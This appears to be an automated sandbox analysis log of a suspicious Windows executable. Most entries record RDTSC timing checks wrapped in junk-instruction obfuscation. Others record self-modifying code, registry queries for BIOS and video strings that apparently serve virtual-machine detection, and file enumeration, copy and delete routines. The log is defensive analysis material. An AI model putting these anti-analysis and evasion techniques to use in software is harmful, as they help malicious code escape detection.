                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6F61 second address: 10B6F6D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6F6D second address: 10B6F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B71B7 second address: 10B71BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B71BB second address: 10B71C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B71C5 second address: 10B71EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF2ACD4h 0x00000007 push edi 0x00000008 jmp 00007F72FCF2ACCAh 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7380 second address: 10B7398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCC0D44Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F72FCC0D446h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7648 second address: 10B7657 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F72FCF2ACC6h 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7657 second address: 10B7670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F72FCC0D44Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7670 second address: 10B7674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7674 second address: 10B767A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B767A second address: 10B7680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2C24 second address: 10C2C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2C28 second address: 10C2C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2C2E second address: 10C2C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2C38 second address: 10C2C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C3577 second address: 10C3582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F72FCC0D446h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C3582 second address: 10C358E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F72FCF2ACC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C358E second address: 10C3596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C3596 second address: 10C359E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C3BF3 second address: 10C3BF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10C3BF9 second address: 10C3C57 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007F72FCF2ACC6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F72FCF2ACCFh 0x00000014 push esi 0x00000015 jmp 00007F72FCF2ACD4h 0x0000001a jo 00007F72FCF2ACC6h 0x00000020 pop esi 0x00000021 jl 00007F72FCF2ACC8h 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d jmp 00007F72FCF2ACD8h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10CBD9D second address: 10CBDA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10CBDA1 second address: 10CBDA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10CBF0B second address: 10CBF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F72FCC0D44Ch 0x0000000d jg 00007F72FCC0D446h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10CE7C7 second address: 10CE7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10CE625 second address: 10CE629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10CE629 second address: 10CE62F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10CE62F second address: 10CE635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10CE635 second address: 10CE63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F72FCF2ACC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10D8E9C second address: 10D8EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10DC98E second address: 10DC996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10DC996 second address: 10DC99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10DC99B second address: 10DC9CC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F72FCF2ACC6h 0x00000009 ja 00007F72FCF2ACC6h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 jc 00007F72FCF2ACC6h 0x0000001b pop edi 0x0000001c jmp 00007F72FCF2ACD5h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10DC9CC second address: 10DC9E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72FCC0D44Eh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10E6192 second address: 10E61AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F72FCF2ACCCh 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10E61AB second address: 10E61D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F72FCC0D44Fh 0x0000000e pushad 0x0000000f popad 0x00000010 jnp 00007F72FCC0D446h 0x00000016 popad 0x00000017 pushad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10E7844 second address: 10E784A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10E784A second address: 10E7854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10E7854 second address: 10E7859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10E7859 second address: 10E7865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F72FCC0D446h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10E7865 second address: 10E7869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10E7869 second address: 10E7891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F72FCC0D452h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F72FCC0D44Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10E7891 second address: 10E78B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF2ACD6h 0x00000007 jbe 00007F72FCF2ACCCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F0692 second address: 10F0699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F3076 second address: 10F307B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F307B second address: 10F3086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F3086 second address: 10F308A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10FC0EB second address: 10FC0FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F72FCC0D452h 0x0000000b jbe 00007F72FCC0D446h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10FA908 second address: 10FA90C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10FA90C second address: 10FA915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10FAC29 second address: 10FAC4C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F72FCF2ACC8h 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F72FCF2ACCAh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10FAC4C second address: 10FAC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10FAC50 second address: 10FAC75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F72FCF2ACC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F72FCF2ACD5h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10FB39B second address: 10FB3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F72FCC0D446h 0x0000000a popad 0x0000000b jmp 00007F72FCC0D44Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10FB3B5 second address: 10FB3BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F72FCF2ACC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1111B66 second address: 1111B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnl 00007F72FCC0D44Eh 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1111B7C second address: 1111B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11082BB second address: 11082D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCC0D44Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11082D5 second address: 11082F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72FCF2ACD8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111FC57 second address: 111FC61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F72FCC0D446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111FC61 second address: 111FC6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111FC6C second address: 111FC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F72FCC0D446h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111FC79 second address: 111FC7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111FC7F second address: 111FC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111FC85 second address: 111FC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111FC89 second address: 111FC93 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F72FCC0D446h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112E57C second address: 112E584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112E584 second address: 112E589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112E589 second address: 112E593 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F72FCF2ACCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112E724 second address: 112E728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112E728 second address: 112E732 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112E732 second address: 112E736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112EDA1 second address: 112EDAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jo 00007F72FCF2ACC6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1130880 second address: 1130886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1135F60 second address: 1135F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 113624B second address: 1136280 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F72FCC0D446h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edx, 6F945F5Ah 0x00000012 push 00000004h 0x00000014 mov dx, cx 0x00000017 call 00007F72FCC0D449h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F72FCC0D453h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1136280 second address: 11362EC instructions: 0x00000000 rdtsc 0x00000002 js 00007F72FCF2ACC8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ebx 0x00000012 ja 00007F72FCF2ACC8h 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d pushad 0x0000001e jmp 00007F72FCF2ACD5h 0x00000023 pushad 0x00000024 jnc 00007F72FCF2ACC6h 0x0000002a jmp 00007F72FCF2ACD6h 0x0000002f popad 0x00000030 popad 0x00000031 mov eax, dword ptr [eax] 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F72FCF2ACD3h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11362EC second address: 11362F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1136606 second address: 113660F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 113660F second address: 1136613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1137FA1 second address: 1137FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F72FCF2ACC6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1137FAE second address: 1137FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F72FCC0D446h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1137FBA second address: 1137FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11399B9 second address: 11399BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EF02DB second address: 4EF02E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EF02E1 second address: 4EF02F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EF02F2 second address: 4EF02F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EF0386 second address: 4EF038B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EF038B second address: 4EF03B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 22910CC6h 0x00000008 movsx ebx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F72FCF2ACD5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EF03B1 second address: 4EF03B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EF03B7 second address: 4EF03BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EF03BB second address: 4EF03DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F72FCC0D44Fh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EF03DB second address: 4EF03F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF2ACD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1055D6A second address: 1055D74 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F72FCC0D446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: EA1BA2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: EA1ACC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C54910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
